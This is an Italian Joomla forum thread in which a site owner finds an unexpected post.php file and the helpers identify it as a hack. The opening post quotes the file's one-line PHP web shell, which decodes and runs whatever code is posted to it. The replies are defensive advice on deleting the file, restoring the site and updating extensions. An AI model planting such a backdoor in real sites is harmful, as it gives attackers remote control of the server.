Back to top

Autore Topic: é corretto avere questo file in joomla? post.php  (Letto 2079 volte)

Offline bevip

  • Nuovo arrivato
  • *
  • Post: 17
    • Mostra profilo
é corretto avere questo file in joomla? post.php
« il: 25 Mar 2010, 19:12:57 »
Ragazzi è corretto avere questo file in joomla 15.5.15- Public_html\includes\post.php con il seguente codice?

<?php
eval (base64_decode($_POST["php"]));
?>

Offline alexred

  • Fuori controllo
  • *
  • Post: 25672
  • Sesso: Maschio
  • Esperto in ozio relaxed
    • Mostra profilo
Re:é corretto avere questo file in joomla? post.php
« Risposta #1 il: 25 Mar 2010, 19:15:12 »
ciao bevip,
no, non è un file di Joomla.

Consiglio di eliminarlo.

Offline bevip

  • Nuovo arrivato
  • *
  • Post: 17
    • Mostra profilo
Re:é corretto avere questo file in joomla? post.php
« Risposta #2 il: 25 Mar 2010, 19:24:40 »
Grazie
Sarà fatto

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:é corretto avere questo file in joomla? post.php
« Risposta #3 il: 25 Mar 2010, 20:16:25 »
ciao bevip,
  quel file ha tutto l'aspetto di essere il risultato di un hack del sito: serve a mandare in esecuzione un codice inviato per mezzo di una semplice form html.

oltre a rimuoverlo verifica anche tutti gli altri files, forse ti converrebbe ricaricare tutti i files, o ripristinare l'installazione da un back up.

ciao,
marco
mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline bevip

  • Nuovo arrivato
  • *
  • Post: 17
    • Mostra profilo
Re:é corretto avere questo file in joomla? post.php
« Risposta #4 il: 26 Mar 2010, 12:49:43 »
Purtroppo e dico purtroppo, anche i backup eseguiti precedentemente sono infetti, nonostante siano stati eseguiti con il sito perfettamente funzionante. Da questo credo si possa dedurre che prima hanno disseminato codice eval() a spaglio tipo in Define.php, indexp.php. ecc.ecc e di tanto in tanto lanciano un robottino che trovando questo codice e cliccando su una ricerca eseguita da google o yahoo ti deviano su un fantomatico sito che nulla a che fare con te. Assomiglia tantissimo come tipologia di attacco a quello eseguito sui siti wordpress 2.7.1. Trovo comunque inquietante che visto il ripetersi di questo problema si sia sempre e solo parlato del ripristino e non della falla. Ciao e grazie.

mau_develop

  • Visitatore
Re:é corretto avere questo file in joomla? post.php
« Risposta #5 il: 26 Mar 2010, 13:42:42 »
Trovo comunque inquietante che visto il ripetersi di questo problema si sia sempre e solo parlato del ripristino e non della falla.
---------------------------------------------------------------------
perchè non c'è una falla,o meglio, se hai il core e tutti gli addons all'ultima versione disponibile questo non accade.
Che senso avrebbe spiegare una falla quando già esiste la patch?

M.

Offline mmleoni

  • Global Moderator
  • Instancabile
  • *****
  • Post: 5547
  • Sesso: Maschio
  • Just another *nix coder/sysadmin...
    • Mostra profilo
Re:é corretto avere questo file in joomla? post.php
« Risposta #6 il: 26 Mar 2010, 14:21:56 »
non è così semplice spiegare ove sia la falla, sicuramente maurizio ha ragione, se non hai fatto gli aggiornamenti è facile che la falla sia in uno dei componenti installati o in joomla.

btw: avete notato che tutti aggiornano joomla, ma quasi nessuno si preoccupa delle varie estensioni?

in altri casi la causa potrebbe anche essere esogena: un paio di mesi fa un sito di un collaboratore, che era stato preparato da me, è stato spianato perché il vicino di directory non aveva mai effettuato aggiornamenti ed il provider aveva configurato il server alla...

potrebbe poi essere un hack dovuto a programmi propri del server...

come vedi le cause possono essere così tante che è impossibile determinare quella esatta senza accedere al server.

ciao,
marco


mmleoni web consulting - creazione siti web aziendali ed e-commerce avanzati - sviluppo moduli e componenti Joomla

Offline bevip

  • Nuovo arrivato
  • *
  • Post: 17
    • Mostra profilo
Re:é corretto avere questo file in joomla? post.php
« Risposta #7 il: 26 Mar 2010, 16:42:04 »
Ragazzi, capisco che non sia una cosa facile, ed a grandi linee il dubbio è: mi trascino questo problema almeno da gennaio? quando ancora avevo la ver. 15.14 di Joomla?.
o quando ancora non era uscito l'aggiornamento di Ozio G.?
la risposta è senzaltro "si" si ma chi?.
Una cosa però funziona bene: questo forum... :)trovo competenza e velocità nelle risposte. ciao. mi auguro di non rompervi più con questa storia altrimenti, hai mè, Significherebbe rifare completamente tutto il sito.


 



Web Design Bolzano Kreatif